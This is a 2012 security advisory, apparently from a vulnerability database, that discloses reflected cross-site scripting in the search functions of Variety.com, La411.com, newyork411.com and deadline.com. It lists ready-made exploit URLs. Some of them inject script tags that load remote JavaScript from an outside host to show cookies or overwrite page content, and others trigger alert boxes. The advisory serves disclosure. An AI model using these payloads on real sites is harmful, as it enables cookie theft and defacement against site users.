Penske Media Corporation Cross Site Scripting

2012.11.21
Credit: Janne Ahlberg
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

---------------------------------------------------------------------------------------------------- Title : Penske Media Corporation reflected Cross Site Scripting (XSS) vulnerabilities Vendor : Penske Media Corporation (http://www.pmc.com/) Description : Multiple PMC web-sites are vulnerable to reflected Cross-site Scripting attacks Advisory time-line: ---------------------------------------------------------------------------------------------------- - Vendor notified : 16-Oct-2012, 9-Nov-2012, 15-Nov-2012 - no responses - Packet Storm advisory : 20-Nov-2012 Test environment ---------------------------------------------------------------------------------------------------- - Latest Firefox browser Vulnerable PMC sites ---------------------------------------------------------------------------------------------------- - Variety.com - La411.com - newyork411.com - deadline.com Details ---------------------------------------------------------------------------------------------------- Affected functionality: site search Test #1: Remote Javascript execution: display browser cookie http://www.variety.com/search/?key=%3C/script%3E%3Cscript%20src=http://idash.net/xs.js%3E%3C/script%3E http://www.la411.com/search/index.cfm?searchParam=%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2Fscript%3Ei&x=0&y=0 http://www.newyork411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2Fscript%3Ei&x=0&y=0 http://www.deadline.com/?s=%22%3E%27%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E Test #2, Remote Javascript execution: overwrite HTML content http://www.variety.com/search/?key=%3C/script%3E%3Cscript%20src=http://idash.net/fr.js%3E%3C/script%3E http://www.la411.com/search/index.cfm?searchParam=%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2Fscript%3Ei&x=0&y=0 http://www.newyork411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2Fscript%3Ei&x=0&y=0 http://www.deadline.com/?s=%22%3E%27%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Ffr.js%3E%3C%2FSCRIPT%3E Test #3, Simple alert http://www.variety.com/search/?key=%3C/script%3E%3Cscript%3E+-+-1-+-+alert%28/XSS/%29%3C/script%3E http://www.la411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cimg+src%3Dx+onerror%3Dprompt%28/XSS/%29%3E&x=0&y=0 http://www.newyork411.com/search/index.cfm?searchParam=%22%3E%27%3E%3Cimg+src%3Dx+onerror%3Dprompt%28/XSS/%29%3E&x=0&y=0 http://www.deadline.com/?s=%22%3E%27%3E%3CSCRIPT%3Eprompt%28/XSS/%29%3C%2FSCRIPT%3E Note: the test cases are not malicious. Researcher ---------------------------------------------------------------------------------------------------- Janne Ahlberg Project site: http://idash.net Twitter: https://twitter.com/JanneFI ----------------------------------------------------------------------------------------------------

References:

https://twitter.com/JanneF
http://www.pmc.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top